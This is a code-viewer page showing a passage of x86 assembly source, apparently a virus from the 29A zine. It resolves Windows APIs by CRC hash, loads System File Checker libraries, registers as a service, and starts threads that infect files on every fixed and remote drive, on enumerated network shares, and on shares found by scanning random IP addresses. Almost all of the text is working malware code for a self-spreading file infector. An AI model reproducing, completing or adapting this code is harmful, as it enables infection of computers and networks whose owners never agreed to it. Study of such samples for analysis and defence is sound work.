📄 29a-7.005
字号:
dd (krncrc_count + 1) dup (0)
krncrcend label near
dd offset swap_create - offset krncrcend + 4
;-----------------------------------------------------------------------------
;swap CreateFileW and CreateFileMappingA because of alphabet order
;-----------------------------------------------------------------------------
swap_create label near
mov dword ptr ds:[offset store_krnapi - offset junkmail_inf + expsize + 401003h], esp
mov ebx, esp
mov eax, dword ptr [ebx + krncrcstk.kCreateFileMappingA]
xchg dword ptr [ebx + krncrcstk.kCreateFileW], eax
mov dword ptr [ebx + krncrcstk.kCreateFileMappingA], eax
;-----------------------------------------------------------------------------
;get SFC support if available
;-----------------------------------------------------------------------------
call load_sfc
db "sfc_os", 0 ;Windows XP (forwarder chain from sfc.dll)
load_sfc label near
call cLoadLibraryA
test eax, eax
jne found_sfc
push 'cfs' ;Windows Me/2000
push esp
call cLoadLibraryA
pop ecx
test eax, eax
je sfcapi_esp
found_sfc label near
call init_findmz
;-----------------------------------------------------------------------------
;API CRC table, null terminated
;-----------------------------------------------------------------------------
sfccrcbegin label near ;place < 80h bytes from call for smaller code
dd (sfccrc_count + 1) dup (0)
sfccrcend label near
dd offset sfcapi_pop - offset sfccrcend + 4
sfcapi_pop label near
pop eax
sfcapi_esp label near
mov dword ptr ds:[offset store_sfcapi - offset junkmail_inf + expsize + 401001h], eax
;-----------------------------------------------------------------------------
;get rest of APIs required for network thread
;-----------------------------------------------------------------------------
push 'rpm'
push esp
call cLoadLibraryA
pop ecx
call init_findmz
;-----------------------------------------------------------------------------
;API CRC table, null terminated
;-----------------------------------------------------------------------------
netcrcbegin label near ;place < 80h bytes from call for smaller code
dd (netcrc_count + 1) dup (0)
netcrcend label near
dd offset netapi_esp - offset netcrcend + 4
netapi_esp label near
mov eax, dword ptr [esp + netcrcstk.nWNetCloseEnum - netcrcstk.nWNetOpenEnumW]
mov dword ptr [edi + offset store_netapi - offset netapi_esp + 1], eax
;-----------------------------------------------------------------------------
;initialise service table if NT/2000/XP
;-----------------------------------------------------------------------------
call cGetVersion
shr eax, 1fh
jne svc_main ;no service if 9x/Me
push eax
push eax
mov eax, offset regdll - offset junkmail_inf + expsize + 401000h
push eax
call cLoadLibraryA
call init_findmz
;-----------------------------------------------------------------------------
;API CRC table, null terminated
;-----------------------------------------------------------------------------
svccrcbegin label near ;place < 80h bytes from call for smaller code
dd (svccrc_count + 1) dup (0)
svccrcend label near
dd offset start_disp - offset svccrcend + 4
start_disp label near
pop eax
mov ecx, esp
add edi, offset svc_main - offset start_disp
push edi
push ecx
push esp
call eax ;does not return if service launch
add esp, size SERVICE_TABLE_ENTRY ;fix stack if app launch
svc_main label near
push eax
push esp
xor esi, esi
push esi
push esi
call create_thr1
;-----------------------------------------------------------------------------
;thread 1: infect files on all fixed and remote drive letters
;-----------------------------------------------------------------------------
find_drives proc near
mov eax, '\:A' ;NEC-PC98 uses A: for boot drive which can be hard disk
drive_loop label near
push eax
push esp
push (krncrcstk.kGetDriveTypeA - krncrcstk.klstrlenW) shr 2
pop eax
call store_krnapi
sub al, DRIVE_FIXED
je drive_set
xchg ecx, eax
loop drive_next ;loop if not DRIVE_REMOTE
drive_set label near
push esp
call cSetCurrentDirectoryA
call find_files
drive_next label near
pop eax
inc eax
cmp al, 'Z' + 1
jne drive_loop
push 60 * 60 * 1000 ;1 hour
call cSleep
jmp find_drives
find_drives endp
create_thr1 label near
push esi
push esi
call cCreateThread
push esp
push esi
push esi
call create_thr2
;-----------------------------------------------------------------------------
;thread 2: find files on network shares using non-recursive algorithm
;-----------------------------------------------------------------------------
call get_krnapis
find_wnet proc near
xor ebx, ebx ;previous handle
xor esi, esi ;previous node
xor edi, edi ;previous buffer
wnet_open label near
push eax
push esp
push edi
push 0
push RESOURCETYPE_DISK
push RESOURCE_GLOBALNET
call dword ptr [ebp + netcrcstk.nWNetOpenEnumW - size netcrcstk]
push eax
push edi
call cGlobalFree
pop ecx
pop edi
inc ecx
loop wnet_next
push size wnetlist
push ecx ;GMEM_FIXED
call cGlobalAlloc
mov dword ptr [eax + wnetlist.wnetprev], esi
mov dword ptr [eax + wnetlist.wnethand], ebx
xchg esi, eax
mov ebx, edi
wnet_next label near
push 1
mov eax, esp
push eax
push esp
push eax
push ebx
call dword ptr [ebp + netcrcstk.nWNetEnumResourceW - size netcrcstk]
pop edi
sub al, ERROR_MORE_DATA
jne wnet_close
push edi
push eax ;GMEM_FIXED
call cGlobalAlloc
xchg ecx, eax
jecxz wnet_close
push edi
mov eax, esp
push 1
mov edx, esp
push eax
push ecx
push edx
push ebx
mov edi, ecx
call dword ptr [ebp + netcrcstk.nWNetEnumResourceW - size netcrcstk]
pop ecx
pop ecx
test eax, eax
jne wnet_free
test byte ptr [edi + NETRESOURCE.dwUsage], RESOURCEUSAGE_CONTAINER
jne wnet_open
push dword ptr [edi + NETRESOURCE.lpRemoteName]
call dword ptr [ebp + krncrcstk.kSetCurrentDirectoryW]
xchg ecx, eax
jecxz wnet_skipdir
;I'm alone here
;with emptiness eagles and snow.
;Unfriendliness chilling my body
;and taunting with pictures of home.
;(Deep Purple)
call find_files
wnet_skipdir label near
xor eax, eax
wnet_free label near
push eax
push edi
call cGlobalFree
pop ecx
jecxz wnet_next
wnet_close label near
push ebx
store_netapi label near
mov eax, '!bgr'
call eax ;WNetCloseEnum
mov ecx, dword ptr [esi + wnetlist.wnetprev]
jecxz wnet_exit
mov ebx, dword ptr [esi + wnetlist.wnethand]
push esi
mov esi, ecx
call cGlobalFree
jmp wnet_next
wnet_exit label near
push 120 * 60 * 1000 ;2 hours
call cSleep
jmp find_wnet
find_wnet endp
create_thr2 label near
push esi
push esi
call cCreateThread
push esp
push esi
push esi
call create_thr3
;-----------------------------------------------------------------------------
;thread 3: find files on random IP address shares using non-recursive algorithm
;(alter class A: 25%, class b: 25%, class c: 25%, class d: scan all)
;-----------------------------------------------------------------------------
call cGetVersion
test eax, eax
mov eax, 'aten'
mov ecx, '23ip' ;"netapi32" (NT/2000/XP)
jns ip_loaddll
mov eax, 'arvs'
movzx ecx, cx ;"svrapi" (9x/Me)
ip_loaddll label near
pushfd
push 0
push ecx
push eax
push esp
call cLoadLibraryA
add esp, 0ch
popfd
jns ip_getprocnt
call init_findmz
;-----------------------------------------------------------------------------
;API CRC table, null terminated
;-----------------------------------------------------------------------------
ip9xcrcbegin label near ;place < 80h bytes from call for smaller code
dd (ip9xcrc_count + 1) dup (0)
ip9xcrcend label near
dd offset ip_share - offset ip9xcrcend + 4
ip_getprocnt label near
call init_findmz
;-----------------------------------------------------------------------------
;API CRC table, null terminated
;-----------------------------------------------------------------------------
ipntcrcbegin label near ;place < 80h bytes from call for smaller code
dd (ipntcrc_count + 1) dup (0)
ipntcrcend label near
dd offset ip_share - offset ipntcrcend + 4
ip_share label near
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -